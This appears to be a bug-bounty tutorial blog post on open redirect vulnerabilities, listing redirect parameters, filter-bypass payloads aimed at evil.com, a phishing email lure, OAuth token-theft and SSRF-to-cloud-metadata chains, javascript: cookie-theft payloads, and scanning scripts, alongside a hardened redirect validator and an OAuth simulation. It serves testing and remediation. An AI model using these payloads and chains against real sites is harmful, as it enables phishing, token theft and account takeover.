What We Learn Today
- Open Redirect from the very basics
- Where to look for input points
- Bypass techniques, elite level
- Impact chains: phishing, OAuth bypass, SSRF
- Automated + manual testing
- Complete bug bounty workflow

Why does it matter? An Open Redirect on its own pays around $100-$500, but chained with SSRF, with an OAuth bypass, or inside a phishing campaign it becomes Critical. One simple parameter can end in account takeover.
What Is an Open Redirect? A Simple Analogy

Think of a trusted receptionist at a company:

Normal:
Visitor: "Take me to Conference Room A"
Receptionist: takes them to Conference Room A ✓

Open Redirect:
Attacker: "Take the visitor from here to the evil building" → forged note
Receptionist: "Sure!" → follows it blindly!

Problem:
→ The visitor saw the trusted company's name
→ Assumed the redirect was legitimate
→ Actually ended up at the evil site!

On a website the receptionist is any endpoint that takes a destination from user input (a query parameter, a form field, sometimes a header) and sends the browser there without checking that it stays on the site. The redirect can be server-side (a 30x response with a Location header) or client-side (window.location = param, a meta refresh).

Legitimate URL:
https://trusted-bank.com/login?next=https://trusted-bank.com/dashboard

Attacker's URL:
https://trusted-bank.com/login?next=https://evil-phishing.com

→ The user sees a trusted-bank.com link
→ Clicks it → redirected to evil-phishing.com
→ Enters their password!

PART 1: Where to Look: Parameter Names
# ─── COMMON REDIRECT PARAMETERS ──────────
?next=
?url=
?redirect=
?redirect_url=
?redirect_uri=
?return=
?return_url=
?returnUrl=
?returnTo=
?goto=
?dest=
?destination=
?target=
?link=
?to=
?ref=
?location=
?continue=
?forward=
?go=
?r=
?redir=
?out=
?view=
?callback=
?from=
?exit=
# ─── OAUTH/SSO SPECIFIC ──────────────────
?redirect_uri=
?callback_url=
?post_logout_redirect_uri=
?success_url=
?error_url=
?after_login=
?after_logout=
# ─── HTTP HEADERS ─────────────────────────
Referer: request header (some apps redirect "back" to it after logout or on error)
Location: response header (where a server-side redirect shows up; inspect it with redirect following turned off)

PART 2: Test Basic Payloads
Basic Test:
# First set up a listener on a host you control.
# Interactsh / Burp Collaborator, or a simple Python server on your own domain:
python3 -m http.server 8888
# Basic payloads (swap evil.com for your own host: you cannot confirm hits on a domain you don't own):
?next=https://evil.com
?url=https://evil.com
?redirect=https://evil.com
?redirect_uri=https://evil.com
# If the response is a 30x whose Location points at your host → Open Redirect confirmed ✓
Try Variations:
# Protocol variations:
?url=https://evil.com
?url=http://evil.com
?url=//evil.com → protocol-relative: the browser prepends the current scheme
?url=\/\/evil.com
?url=\\evil.com → browsers treat a backslash as a forward slash in http(s) URLs
# JavaScript protocol:
?url=javascript:alert(1) → XSS possible as well
?url=data:text/html,<script>alert(1)</script>
# Caveat: a browser ignores javascript:/data: in a Location header, so these only fire
# when the redirect is done client-side (window.location = param, meta refresh).

PART 3: Bypass Techniques, Elite Level!
Bypass 1: The @ Trick
# Browser URL parsing: everything before @ is userinfo, the real host comes after it
https://trusted.com@evil.com
→ the browser goes to evil.com!
→ the user only notices "trusted.com" in the URL
?url=https://trusted.com@evil.com
?redirect=https://target.com@evil.com
# Defeats checks like url.startswith("https://target.com")

Bypass 2: Subdomain Confusion
?url=https://evil.com.target.com
# If the server only checks that the string contains "target.com"
# → evil.com.target.com passes too! (only useful if you control that subdomain, e.g. through a takeover)
# Hosts you can actually register that still contain the string:
?url=https://target.com.evil.com
?url=https://evil-target.com
?url=https://evilXtarget.com

Bypass 3: URL Fragment (and Path)
?url=https://evil.com#target.com
?url=https://evil.com#.target.com
?url=https://evil.com/.target.com
# "target.com" after the # (or in the path) satisfies a contains/endswith check, but the host is still evil.com → filter bypass!

Bypass 4: CRLF + Whitespace
?url=https://evil.com%09
?url=https://evil.com%0a
?url=https://evil.com%0d
?url=https://evil.com%00
?url=%20https://evil.com
?url=%0ahttps://evil.com
# The filter's regex or startswith() sees the control character; the browser strips tabs/newlines
# and leading/trailing whitespace before parsing, so it still lands on evil.com.

Bypass 5: Double Slash
?url=//evil.com
?url=///evil.com
?url=////evil.com
?url=https:///evil.com
?url=/\evil.com
?url=\/evil.com
# Browsers collapse the extra slashes and treat \ as /, so all of these resolve to evil.com.
# A server-side parser (e.g. Python's urlsplit) sees ///evil.com as an empty host plus a relative path, so a "relative paths are fine" check lets it through.

Bypass 6: URL Encoding
?url=https%3A%2F%2Fevil.com
?url=https%3A//evil.com
?url=%68%74%74%70%73%3A%2F%2Fevil.com
# Double encoding (works when the app decodes twice, e.g. once in the framework and once in its own code):
?url=https%253A%252F%252Fevil.com

Bypass 7: IP Address
?url=http://1.2.3.4 → IP directly
?url=http://0x1.0x2.0x3.0x4 → hex IP
?url=http://16909060 → decimal form of 1.2.3.4
# Alternate notations evade regex blocklists; you still need to control that IP to receive the victim.

Bypass 8: Open Redirect via Referer
GET /logout HTTP/1.1
Host: target.com
Referer: https://evil.com
# Does the app redirect to the Referer after logout?
→ Open Redirect via header! (Low impact on its own: you cannot set a victim's Referer to an arbitrary value, only lure them from a page you control.)

PART 4: Impact Chains: This Is Where the Real Power Is!
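Before the chains, one more thing on the bypasses from Part 3: every one of them defeats a check that looks at the redirect string instead of the parsed host. The following is an added example, not code from the original article: a Python validator that blocks all of them, placed next to the naive check they beat, so you can see exactly why each payload works. The site host `target.com` and the payload list are assumptions for the demo; the payloads are written as the server sees them after URL-decoding. It doubles as the remediation to recommend in the report.

```python
from urllib.parse import urlsplit

ALLOWED_HOST = "target.com"   # assumption: the application's own host


def naive_is_safe(url: str) -> bool:
    """The kind of string check the bypasses in Part 3 defeat."""
    return url.startswith("/") or ALLOWED_HOST in url


def is_safe_redirect(url: str, allowed_host: str = ALLOWED_HOST) -> bool:
    """Allow only a same-site relative path or an https URL whose parsed host is exactly allowed_host."""
    # Control characters, whitespace and non-ASCII are dropped or re-interpreted by browsers; refuse them.
    if not url or not url.isascii() or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        return False
    # Browsers treat '\' as '/' in http(s) URLs, so "/\evil.com" means "//evil.com".
    if "\\" in url:
        return False
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: scheme must be https and the host must match exactly.
        # parts.hostname is the real host even for "https://target.com@evil.com" (it is evil.com).
        return (parts.scheme == "https"
                and "@" not in parts.netloc
                and parts.hostname == allowed_host)
    # Relative URL: exactly one leading slash. "//evil.com" and "///evil.com" are host-relative
    # to the browser even though urlsplit reports an empty netloc for "///evil.com".
    return url.startswith("/") and not url.startswith("//")


# Constructed payloads: what the server sees after URL-decoding the bypasses from Part 3.
BYPASS_PAYLOADS = [
    "//evil.com",
    "///evil.com",
    "/\\evil.com",
    "https://target.com@evil.com",
    "https://target.com.evil.com",
    "https://evil.com#target.com",
    "https://evil.com/.target.com",
    "https://evil.com?target.com",
    "javascript://target.com/%0aalert(1)",
]


def bypasses(naive=naive_is_safe, hardened=is_safe_redirect):
    """Payloads the naive check lets through that the hardened check blocks."""
    return [p for p in BYPASS_PAYLOADS if naive(p) and not hardened(p)]


if __name__ == "__main__":
    for p in BYPASS_PAYLOADS:
        print(f"{p!r:42} naive={naive_is_safe(p)!s:5} hardened={is_safe_redirect(p)}")
    print("legit:", is_safe_redirect("/dashboard"), is_safe_redirect("https://target.com/dashboard"))
```

Run it and every row prints naive=True, hardened=False. The hardened rule is short: accept a relative path with exactly one leading slash, or an https URL whose parsed hostname equals the site's own host, and refuse control characters, backslashes and non-ASCII before parsing, because browsers silently normalise those away while server-side filters do not.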
Chain 1: Open Redirect → Phishing
Step 1: Find the Open Redirect:
https://trusted-bank.com/login?next=https://evil.com
Step 2: Build the evil site so it looks like the trusted bank
Step 3: Email the victim:
"Your account is compromised!
Click here to secure: https://trusted-bank.com/login?next=https://evil.com"
Step 4: The victim:
→ sees trusted-bank.com in the URL ✓
→ clicks
→ is redirected to the evil site
→ enters their password → STOLEN!
Impact: High → Critical!
Bounty: $500-$2000

Chain 2: Open Redirect → OAuth Token Theft, CRITICAL!
Normal OAuth flow:
1. User clicks "Login with Google"
2. Google redirects to target.com/callback?code=ABC
3. target.com exchanges the code for an access token

OAuth + Open Redirect attack:
1. Find a redirect_uri the provider accepts that lands on an open redirect, e.g.
   target.com/oauth/start?redirect_uri=https://target.com/callback?next=https://evil.com
   (a plain redirect_uri=https://evil.com is rejected by any provider that enforces exact matching, because only target.com's URI is registered)
2. The provider accepts it because the registered URI matches as a prefix, or because the registered URI is itself the vulnerable endpoint
3. The provider redirects the browser to target.com/callback?code=ABC&next=https://evil.com
4. target.com/callback forwards the browser to evil.com, and the secret travels with it: a code in the query leaks if the app copies the query into the next Location or through the Referer (where the Referrer-Policy allows it); an implicit-flow token in the #fragment travels automatically, because browsers keep the fragment across a redirect whose Location has none
5. evil.com harvests the code/token → access to the account!
This = Critical! Account takeover!
Bounty: $3000-$10000+

Chain 3: Open Redirect → SSRF
If a server-side fetcher follows redirects:
?url=https://trusted.com/redirect?to=http://169.254.169.254/
Step 1: target.com/fetch?url=https://trusted.com/redirect?to=...
Step 2: The server requests trusted.com (which passes its allowlist)
Step 3: trusted.com redirects → 169.254.169.254
Step 4: The server follows the redirect → AWS metadata!
Open Redirect + SSRF = Critical!
# Caveats: this needs a fetcher that follows redirects (curl -L, requests' default allow_redirects=True) and validates only the first URL rather than every hop. On AWS a plain GET only works against IMDSv1; IMDSv2 requires a PUT to obtain a token first.

Chain 4: Open Redirect → XSS
?next=javascript:alert(document.cookie)
?url=data:text/html,<script>alert(1)</script>
# If the redirect is performed client-side (window.location = next) and the javascript: scheme is not rejected:
→ XSS execution!
→ Cookie theft (unless the cookie is HttpOnly)!
→ Account takeover!

PART 5: OAuth redirect_uri, Special Attention!
The most valuable Open Redirect in bug bounty!
Normal OAuth:
GET /oauth/authorize?redirect_uri=https://target.com/callback
Attack: exact-match bypass
redirect_uri=https://target.com/callback?next=https://evil.com
# If the server only checks the prefix → bypass!
redirect_uri=https://target.com.evil.com/callback
redirect_uri=https://target.com/callback/../../../redirect?url=evil.com
Path traversal bypass:
redirect_uri=https://target.com/oauth/../open-redirect?url=evil.com
# Every one of these should fail: RFC 6749 and the OAuth 2.0 Security BCP require the provider to compare redirect_uri against the registered value with exact string matching.
# If the bypass works:
→ the OAuth code/token ends up on evil.com
→ Account takeover!
→ Critical bounty!

PART 6: Automated Testing
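Before the tooling, the chain from Chain 2 and Part 5 as something you can run. This is an added simulation, not the article's code and not a real provider: three mock parties in Python, the authorization server, the vulnerable target.com/callback that redirects on `next=`, and a browser that applies the fragment-preservation rule on redirects. The registered URI, the token value and the `next=` parameter name are assumptions. With exact matching the chain dies at step 1; with prefix matching the implicit-flow token ends up on evil.com.

```python
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Assumptions for the simulation (not a real provider or app):
REGISTERED_URI = "https://target.com/callback"   # what the client registered at the provider
TOKEN = "SECRET_TOKEN"                            # constructed token value


def provider_authorize(redirect_uri: str, mode: str = "exact"):
    """Mock authorization server (implicit flow). Returns the Location it sends the browser to,
    or None if redirect_uri is rejected. mode="exact" is what RFC 6749 / the OAuth Security BCP
    require; mode="prefix" is the weak startswith() comparison the attack depends on."""
    if mode == "exact":
        accepted = redirect_uri == REGISTERED_URI
    elif mode == "prefix":
        accepted = redirect_uri.startswith(REGISTERED_URI)
    else:
        raise ValueError(mode)
    if not accepted:
        return None
    return f"{redirect_uri}#access_token={TOKEN}&token_type=bearer"


def target_callback(request_url: str) -> str:
    """Mock target.com/callback with the page's bug: it redirects to ?next= without validation."""
    query = parse_qs(urlsplit(request_url).query)
    return query.get("next", ["/dashboard"])[0]


def browser_follow(current_url: str, location: str) -> str:
    """Browser redirect rule (RFC 7231 §7.1.2 / Fetch): if the Location has no fragment,
    the fragment of the current URL is kept. That is what carries the token to evil.com."""
    cur, loc = urlsplit(current_url), urlsplit(location)
    if cur.fragment and not loc.fragment:
        loc = loc._replace(fragment=cur.fragment)
    return urlunsplit(loc)


def run_chain(mode: str):
    """Where does the browser end up (with what fragment) for a given provider matching mode?"""
    attacker_redirect_uri = REGISTERED_URI + "?next=https://evil.com/"
    step1 = provider_authorize(attacker_redirect_uri, mode)   # provider -> target.com/callback
    if step1 is None:
        return None                                           # rejected: chain dead
    step2 = target_callback(step1)                            # target.com -> evil.com (open redirect)
    return browser_follow(step1, step2)                       # fragment rides along


if __name__ == "__main__":
    print("exact :", run_chain("exact"))
    print("prefix:", run_chain("prefix"))
```

The simulation uses the implicit flow because the fragment leak needs no cooperation from the app. For the authorization-code flow the code sits in the query string, so it only reaches evil.com if target.com copies the query into its own Location or the Referrer-Policy lets the full URL through. Two fixes: the provider compares redirect_uri with exact string matching, and the callback validates `next=` against the site's own host instead of redirecting blindly.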
Tool 1: gau + grep (Fastest Method)
# Pull redirect parameters out of historical URLs.
# Keep the regex on ONE line: a line break inside the quoted pattern makes every alternative after it unmatchable.
gau target.com | grep -iE "next=|url=|redirect=|return=|goto=|dest=|destination=|target=|redir=|redirect_uri=|callback=" > redirect_params.txt
echo "Redirect params: $(wc -l < redirect_params.txt)"
# Test: qsreplace swaps every query value for your host; httpx prints the Location of any 30x response.
# No -follow-redirects here: you want the first hop, not the final page.
cat redirect_params.txt | \
  qsreplace "https://evil.com" | \
  httpx -silent -location -mc 301,302,303,307,308 | \
  grep "evil.com" > open_redirects.txt
# Caveat: this only catches Location-header redirects. Client-side redirects (window.location, meta refresh) need a body grep or a browser, and because qsreplace changes every parameter at once, confirm the responsible one by hand.

Tool 2: Nuclei Open Redirect Templates
# The template path depends on your nuclei-templates version; the -tags filter is the portable way.
nuclei -l targets.txt \
  -t ~/nuclei-templates/vulnerabilities/generic/open-redirect.yaml \
  -o redirect_found.txt
nuclei -l targets.txt \
  -tags redirect \
  -o nuclei_redirects.txt

Tool 3: Custom Python Tester
#!/usr/bin/env python3
# open_redirect_test.py  -  usage: python3 open_redirect_test.py https://target.com/login
import sys
from urllib.parse import urlsplit

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = sys.argv[1]
# Use a host you control (Interactsh / Collaborator) so a hit can be confirmed out of band.
EVIL_DOMAIN = "https://evil-test-12345.com"
EVIL_HOST = urlsplit(EVIL_DOMAIN).netloc

PAYLOADS = [
    EVIL_DOMAIN,
    f"//{EVIL_HOST}",
    f"///{EVIL_HOST}",
    f"https://trusted.com@{EVIL_HOST}",
    f"{EVIL_DOMAIN}#.trusted.com",   # '#' is percent-encoded below; otherwise requests drops the fragment
    "javascript:alert(1)",
    f"%2F%2F{EVIL_HOST}",            # already encoded, so it arrives double-encoded (tests %25 decoding)
    f"https:////{EVIL_HOST}",
]
PARAMS = ["next", "url", "redirect", "return", "goto", "dest", "redir", "target",
          "redirect_url", "returnUrl", "continue"]

print(f"Testing Open Redirect: {TARGET_URL}\n")
for param in PARAMS:
    for payload in PAYLOADS:
        try:
            # params= percent-encodes the value, so '#', '/' and '@' reach the server intact;
            # allow_redirects=False keeps the first hop's Location instead of the final page
            r = requests.get(TARGET_URL, params={param: payload},
                             allow_redirects=False, timeout=5, verify=False)
        except requests.RequestException as exc:
            print(f"[!] {param}={payload}: {exc}")
            continue
        location = r.headers.get("Location", "")
        loc = urlsplit(location)
        # Hit: the redirect leaves the site for our host (also catches user@host and //host forms),
        # or uses a javascript:/data: scheme (only exploitable if a client-side redirect consumes it)
        if (loc.hostname or "") == EVIL_HOST or loc.scheme in ("javascript", "data"):
            print(f"FOUND! Param: {param}")
            print(f"  Payload : {payload}")
            print(f"  Status  : {r.status_code}")
            print(f"  Location: {location}")
            print(f"  URL     : {r.url}\n")

PART 7: Complete Elite Workflow
#!/bin/bash
# open_redirect_hunt.sh  -  usage: ./open_redirect_hunt.sh target.com
set -u
TARGET="${1:?usage: $0 target.com}"
DIR="redirect_${TARGET}"
mkdir -p "$DIR"
# One-line regex: a newline inside the quoted pattern makes the alternatives after it unmatchable
PATTERN='next=|url=|redirect=|return=|goto=|dest=|redir=|redirect_uri=|callback='

echo "Open Redirect Hunt: $TARGET"
echo "────────────────────────────────"

# Step 1: redirect parameters from historical URLs, de-duplicated with uro
echo "Finding redirect parameters..."
gau "$TARGET" | grep -iE "$PATTERN" | uro > "$DIR/redirect_urls.txt"
echo "URLs: $(wc -l < "$DIR/redirect_urls.txt")"

# Step 2: live check
httpx -silent -mc 200,301,302 < "$DIR/redirect_urls.txt" > "$DIR/live_redirects.txt"

# Step 3: inject the payload into every query value and keep the first hop's Location.
# No -follow-redirects: it would report the final 200 and hide the 30x you are looking for.
echo "Testing payloads..."
qsreplace "https://evil.com" < "$DIR/live_redirects.txt" | \
  httpx -silent -location -mc 301,302,303,307,308 | \
  grep "evil.com" > "$DIR/open_redirects.txt"

# Step 4: nuclei scan
nuclei -l "$DIR/live_redirects.txt" \
  -tags redirect,open-redirect \
  -silent \
  -o "$DIR/nuclei_redirect.txt" 2>/dev/null

# Step 5: OAuth redirect_uri candidates (test these by hand, see PART 5)
echo "OAuth redirect_uri check..."
gau "$TARGET" | grep -iE "redirect_uri=|callback_url=" | uro > "$DIR/oauth_redirects.txt"

echo "────────────────────────────────"
echo "Results:"
echo "Redirect URLs   : $(wc -l < "$DIR/redirect_urls.txt")"
echo "Open Redirects  : $(wc -l < "$DIR/open_redirects.txt")"
echo "OAuth URIs      : $(wc -l < "$DIR/oauth_redirects.txt")"
echo "Nuclei Findings : $(wc -l < "$DIR/nuclei_redirect.txt")"
echo "Results in      : $DIR/"

Open Redirect Cheat Sheet
# ─── BASIC PAYLOADS ───────────────────────
?next=https://evil.com
?url=//evil.com
?redirect=\/\/evil.com
# ─── BYPASS ───────────────────────────────
@ trick      → https://trusted.com@evil.com  (host is evil.com)
# fragment   → https://evil.com#trusted.com  (the trusted name goes AFTER the #; https://trusted.com#evil.com stays on trusted.com)
%09          → https://evil.com%09           (tab character)
%0a          → https://evil.com%0a           (newline)
///evil.com  → triple slash
javascript:alert(1) → XSS via a client-side redirect
# ─── OAUTH BYPASS ─────────────────────────
redirect_uri=https://target.com/callback?url=evil.com
redirect_uri=https://target.com.evil.com
redirect_uri=https://target.com/../redirect?to=evil.com
# ─── CHAINS ───────────────────────────────
Open Redirect + Phishing → social engineering
Open Redirect + OAuth → account takeover!
Open Redirect + SSRF → internal access!
Open Redirect + XSS → cookie theft!
# ─── TOOLS ────────────────────────────────
gau + grep + qsreplace + httpx → automated
nuclei -tags redirect → templates
Manual Burp testing → bypass testing

Bounty Impact Guide
Low ($100-200):
→ Basic redirect to an external site
→ No authentication context
→ Non-sensitive application
Medium ($200-500):
→ Authenticated redirect
→ Login-flow redirect
→ Phishing potential
High ($500-2000):
→ OAuth redirect_uri bypass
→ Authentication token exposure
→ SSRF chain potential
Critical ($2000-10000+):
→ OAuth token theft → account takeover
→ SSRF chain → internal access
→ Admin panel redirect

Today's Homework
# 1. Find redirect params in historical URLs:
gau hackerone.com | grep -iE "next=|url=|redirect=" | head -20
# 2. Install qsreplace:
go install github.com/tomnomnom/qsreplace@latest
# 3. Practice:
echo "https://example.com/login?next=https://example.com" | \
  qsreplace "https://evil.com"
# 4. Test manually in Burp Suite:
# Find a login page → next= parameter
# Replace the value with evil.com → check the redirect (with "follow redirects" off)
# 5. Find OAuth apps:
# Apps with "Login with Google/Facebook"
# Test the redirect_uri parameter

Quick Revision
Open Redirect = unvalidated URL redirect
Find = next=, url=, redirect=,
       return=, goto=, dest=
Bypass = @ trick, //, fragment,
         encoding, whitespace
Chains = + Phishing → social engineering
         + OAuth → account takeover!
         + SSRF → internal access!
         + XSS → cookie theft!
Tools = gau + qsreplace + httpx
        nuclei -tags redirect
Alone = Low-Medium ($100-500)
With a chain = Critical ($2000-10000+)!

My Take...
On a SaaS app I saw:
https://target.com/auth/logout?redirect=https://target.com/home

I tested:
https://target.com/auth/logout?redirect=https://evil.com

It redirected to evil.com! Open Redirect confirmed.
I built a phishing PoC, but the bounty was only $200.
Then I thought: this app has OAuth too!
https://target.com/oauth/google/callback?redirect_uri=https://target.com/auth/logout?redirect=https://evil.com

Google OAuth token → target.com → logout → evil.com!
The token was in the URL; on evil.com I received the Google OAuth code!
Account takeover chain complete!
Bounty: $3,500, Critical!
Lesson: an Open Redirect alone is weak, but build a chain and its value goes up 10x!

Next article: Authentication Bypass. Bypass the login page, become admin, exploit tokens!
HackerMD Bug Bounty Hunter | Cybersecurity Researcher GitHub: BotGJ16 | Medium: @HackerMD
Previous: Article #21 Backup Files Exposure Next: Article #23 Authentication Bypass: Login Bypass Se Admin Tak!
#OpenRedirect #BugBounty #WebSecurity #EthicalHacking #Hinglish #OAuthBypass #HackerMD